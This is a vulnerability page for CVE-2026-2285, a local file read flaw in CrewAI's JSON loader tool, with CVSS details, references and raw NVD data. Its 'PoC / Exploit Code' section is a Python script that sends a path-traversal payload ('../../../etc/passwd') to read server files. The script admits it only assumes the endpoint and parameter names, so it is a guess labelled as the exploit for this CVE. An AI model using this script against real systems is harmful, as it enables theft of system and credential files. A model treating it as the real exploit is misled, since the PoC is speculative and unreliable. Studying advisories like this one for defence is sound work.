CVE-2026-2285

Description

CrewAI contains a arbitrary local file read vulnerability in the JSON loader tool that reads files without path validation, enabling access to files on the server.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:* - VULNERABLE

CrewAI (具体受影响版本未在提供的信息中披露)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-2285 (CrewAI Arbitrary Local File Read)
# This script demonstrates how a lack of path validation can lead to file reading.

import requests

def exploit_crewai_lfi(target_url, malicious_path):
    """
    Exploit the JSON loader tool to read arbitrary files.
    :param target_url: The URL of the CrewAI instance endpoint
    :param malicious_path: The path to the file on the server (e.g., '../../../etc/passwd')
    """
    # Assuming the vulnerable endpoint accepts a 'file_path' parameter or JSON body
    payload = {
        "file_path": malicious_path,
        "action": "load_json"
    }

    try:
        # Sending the malicious request
        response = requests.post(target_url, json=payload)
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://localhost:8000/api/load-json" 
    # Path traversal payload to read /etc/passwd on Linux
    file_to_read = "../../../etc/passwd"
    
    print(f"[*] Attempting to read {file_to_read} from {target}...")
    exploit_crewai_lfi(target, file_to_read)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2285
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2285
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2285/
[4] VulDB https://vuldb.com/cve/CVE-2026-2285
[5] https://www.kb.cert.org/vuls/id/221883

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2285", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:04.670", "lastModified": "2026-04-15T13:37:26.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CrewAI contains a arbitrary local file read vulnerability in the JSON loader tool that reads files without path validation, enabling access to files on the server."}, {"lang": "es", "value": "CrewAI contiene una vulnerabilidad de lectura arbitraria de archivos locales en la herramienta de carga JSON que lee archivos sin validación de ruta, permitiendo el acceso a archivos en el servidor."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3DC9BCCB-78E5-4D50-9EAD-6F54EB4E3153"}]}]}], "references": [{"url": "https://www.kb.cert.org/vuls/id/221883", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}